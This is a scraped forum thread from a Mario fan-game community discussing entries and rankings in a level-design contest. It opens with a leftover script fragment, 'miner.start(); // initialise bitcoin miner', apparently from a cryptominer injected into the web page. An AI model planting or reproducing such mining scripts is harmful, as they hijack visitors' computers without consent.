miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

The Talkhaus "Make A Good Level" Contest -- Discussion

they were fun, but now they're done
Kerkec

Re: The Talkhaus "Make A Good Level" Contest -- Discussion

Postby Kerkec » 7 years ago

Ahaha, I'm glad it seems most people enjoyed it at least a bit. Definitely a bit flawed, I know. Watching raocow's play of it, I'm wondering if maybe the single empty brown block near the start isn't enough to indicate that there's probably a door there? I probably could've done something better there. I noticed raocow carried the P-switch through the entire second half of that first room, and, uh, congratulations on that, but why didn't you just turn around? Ahaha. Maybe you were testing it in various places, I dunno. And you know, after you got the cape, instead of risking the mace-jump again, you could've used the platform to the left of the pipe to just fly up to the shell, ahaha. Just seemed like you did things the hard way a lot in this level, but then maybe I didn't make things obvious enough.

Anyway, yeah, the midpoint might seem kind of "lopsided", but I think both halves of the level are pretty short once you know what you're doing, and since the first part is a sort of puzzle, there wasn't anywhere else to put it unless I just made the level longer, but then it'd probably be too long and unfocused. And hey, you didn't have to do the puzzle over again! Oh, and that pipe at the end is just an exit from a bonus you missed, but you wouldn't be able to get it without making it to the end with your cape anyway. Nothing exciting about it, just some prizes.

Also you spelled and pronounced my username wrong, but that's okay, ahaha. You're definitely not the first. And that extra place on the right is doable, and it is annoying, so it's probably best you didn't waste your time on it.
yogui wrote:Oh so there was a invisible door at the beginning of the level? I didn't knew that, when I played the level I walked between the two red spikes until I'm in "run mode" so I can do a running jump and get to the door.
Oh wow, that's a pretty bad oversight. Hopefully the only one I made, ahaha...

Anyway, thanks for all the feedback! I am happy with 18th, and I can't wait to see the rest of the rankings.

RobinLSL

Postby RobinLSL » 7 years ago

raocow always does things the hard way ;D

I think the midpoint placement was fine, like sebby said, you had to put it after the puzzle.

limepie20

Postby limepie20 » 7 years ago

I apparently wrote barely anything for my judging comments, so I'll just write stuff here.
I thought the first half of the level was nice, but I wasn't too fond of the second half being completely different gameplay-wise. It would've felt better if you did it smw-style and had the whole level one puzzle. The second half felt kinda generic, too. It was just your ordinary layer 2 smash room.

Argumentable
the biggest shit

Postby Argumentable » 7 years ago

Guess I'll have to post mine then, and now you'll know why I haven't been
I don't really like ghost houses. This one wasn't horrible, though. There were some parts of the puzzle that felt really easy, and then there was that arrow thing which I sort of just found on accident. I didn't notice that it was meant to be an arrow so whatever. It's not like I was searching around forever for it, I just kind of felt like the p-switch doors in general could've been better. Also, I felt like a lot of the jumps were needlesly difficult or too high or whatever. Still, it was a sort-of puzzle and I got through it. I say it's sort-of cause I was able to solve it so obviously it wasn't a puzzle.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 7 years ago

that is some quality write-up there argue
the chillaxest of dragonsImage
ImageImage

Argumentable
the biggest shit

You should read my column in the local newspaper

TomPhanto

Postby TomPhanto » 7 years ago

Ghost houses generally have the reputation of being confusing and/or annoying. I didn't really like this level since I had a lot of difficulty with figuring out what to do.
Keys are important. When a key is lost, all madness shall break loose.

Bwarch
Local Candy Fiend
Pronouns: He/Him/His

Postby Bwarch » 7 years ago

TomPhanto wrote:Ghost houses generally have the reputation of being confusing and/or annoying. I didn't really like this level since I had a lot of difficulty with figuring out what to do.
This, pretty much.

FPzero
Try new Phazon Ice(TM), blue, refreshing, horribly mutagenic!

Postby FPzero » 7 years ago

I feel like ghost houses are probably the weakest type of level one can make unless they have a near-masterful grasp of SMW's puzzle elements, along with the know-how to make illusory elements. And since SMW has almost no puzzle elements without adding new things to the game, this becomes even harder to do vanilla. I think that's why my ghost houses tend to be a haunted house setting and not focus on puzzles at all. Puzzles are not my strong suit and I know this, so I don't spend time making them.

AUS

Postby AUS » 7 years ago

FirePhoenix wrote:I feel like ghost houses are probably the weakest type of level one can make unless they have a near-masterful grasp of SMW's puzzle elements
*cough*
It is a bit offtopic, but all I could think about was this when you said that. Whatever.
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

Sebby19

Postby Sebby19 » 7 years ago

After watching that AUS linked, I have to ask again, how was that fake-out goal done?
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

alex2
Banned

Postby alex2 » 7 years ago

There's a sprite about two screens to the right of the goal that interrupts the victory walk routine when it spawns. If you scroll the screen to the left before the goal, it doesn't spawn. ~TASing tricks~
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

Kerkec

Postby Kerkec » 7 years ago

yogui wrote:Oh so there was a invisible door at the beginning of the level? I didn't knew that, when I played the level I walked between the two red spikes until I'm in "run mode" so I can do a running jump and get to the door.
I tried this myself, and I have to say... if you can pull that off easily, you deserve to take the shortcut, even though it was totally unintended, ahaha. Then again, I'm not very good at the game, really, I don't think. Maybe it's easier for better people, but I savestated and tried about 20 times before I got it once.

Jolpengammler
Jipples, the friendly dog

Postby Jolpengammler » 7 years ago

I wonder where my level is on the list.. I am guessing I am 14th place .. :D
"Ban all the facial hair from life." ~ Horikawa Otane, 2014
"You're shitting with me!" ~ Isocitration, 2014
"skype adds think I'm a lady looking for 40 years old men" ~ raocow, 2016
"i always run up and down the stairs because i want to die" ~Isocitration, 2016

Depressed Horse:

peteyboo

Postby peteyboo » 7 years ago

Today was a very SMW-y level, especially that side area. It looks like exactly something Nintendo would put in.

That said, the whole point was that the mushrooms broke the bridge, but you, or at least raocow, never actually saw that. We saw broken bridges and mushroom platforms, but never both at the same time. And I'm sure the judges took points off for useless enemies even though it seems that you had a choice not to take the ropes and possibly actually see these bridge-breaking mushies.

Paperkoopa

Postby Paperkoopa » 7 years ago

Wow! raocow actually liked my level! Also I forgot an "R" in "IMPORTANT" ._.
@peteyboo You can usually take the lower path, aswell as the upper path. And, as you said, on the lower parts there were a lot of broken pieces of bridge and whatnot but raocow took the upper route instead.

Argumentable
the biggest shit

Jolpengammler wrote:I wonder where my level is on the list.. I am guessing I am 14th place .. :D
Wrong, there's no such thing as a 14th place

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 7 years ago

I think the level right before this one was better than todays. Now excuse me so I can condense my angier and fustrations into a 10,000 character post.

Paperkoopa

Septentrion Pleiades wrote:I think the level right before this one was better than todays. Now excuse me so I can condense my angier and fustrations into a 10,000 character post.
Why do you thinks so? Please judge my level! I'd be glad to find things I can improve next time.

Septentrion Pleiades
Banned
First name: Stephen

Postby Septentrion Pleiades » 7 years ago

I just like overall complexity more than level design, and this level clearly masters the latter. Plus I think that's a nice easter egg, even though it shouldn't have affect the score that much. It was long yet stayed innovated.

Opps, I mean the judges is stupid. the last lvl clearly more thoght out and make very good use of layer2 and puzzuls This lvl was boring

limepie20

Postby limepie20 » 7 years ago

I basically said it wasn't special, but it was nice. I don't know what else to say, really!

Argumentable
the biggest shit

There's nothing really wrong with this level, whereas the previous one had some flaws in it. Yes, I'd say the previous one probably wins in the fun category (in fact, it did), but it had it's faults. I don't think you could really look at paperkoopa's level and say anything is wrong with it except for "is it fun?"

Yes, fun was the main focus, but everything else did have an effect. Also I thought the secret exit should have had more to it

Cup

Postby Cup » 7 years ago

This level had a lot of really cool ideas. If they were approached only slightly differently during the planning stages, I think it would have been one of my favorites in the contest.

The secret exit for instance, if instead of being tacked on at the end (something that bugs most everyone) it was actually hidden in the level and expanded the concept of easter egg line art being constructed as its own interactive sublevel, it'd be an amazingly rewarding experience for those who found it.

The level itself too. The pieces were there. All I think it needed to do was focus on the visual consequences of overgrown mushrooms wreaking the bridge. It could really have been quite a sight! An out of control fungus breaking apart and leeching into man made constructions is a really cool visual concept and also carries with is a lot of platforming implications that could play off it well.

Just a little more focus on the underlying ideas involved in this level, and how to use those ideas in a platformer would have made this into a great experience.

Paperkoopa

Thanks everyone!
patgangster's level felt really familiar (Donut Plains).
I think the blue koopa was a bit unfair, especially if the level is supposed to be an early-game-type-of-level.
I can understand though why the level was ranked higher than mine, good job!

Patgangster

Postby Patgangster » 7 years ago

Warning: horrible crazy spoilers and a thing ...also that blue koopa was more of a problem than I initially thought it was. lol meh.

Return to “old contests”